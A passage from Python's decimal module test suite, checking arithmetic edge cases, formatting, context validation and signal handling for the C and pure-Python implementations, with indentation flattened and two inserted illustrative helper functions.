x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
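# Editorial sketch (not part of the test suite): the special-value divmod
# behaviour from Coverage.test_divmod above -- quiet NaNs propagate without
# signaling, while infinity divided by infinity signals InvalidOperation and
# returns NaNs once the trap is disabled. Stdlib decimal assumed:
def _example_special_divmod():
    import decimal
    with decimal.localcontext() as c:
        q, r = divmod(decimal.Decimal('NaN'), 7)    # quiet NaN: no signal
        assert q.is_nan() and r.is_nan()
        c.traps[decimal.InvalidOperation] = False
        c.clear_flags()
        q, r = divmod(decimal.Decimal('inf'), decimal.Decimal('inf'))
        assert q.is_nan() and r.is_nan()
        assert c.flags[decimal.InvalidOperation]    # condition was recorded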
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
        self.assertRaises(TypeError, setattr, c, 'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
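# Editorial sketch (not part of the test suite): the growth property behind
# test_sizeof above -- with the C implementation, a Decimal's footprint grows
# by one machine word per extra chunk of coefficient digits; only the weaker
# monotonicity claim is illustrated here, since digits-per-word depends on
# the build:
def _example_sizeof_growth():
    import sys
    import decimal
    small = sys.getsizeof(decimal.Decimal(10 ** 50))
    large = sys.getsizeof(decimal.Decimal(10 ** 500))
    assert large > small                  # more digits, larger footprint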
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
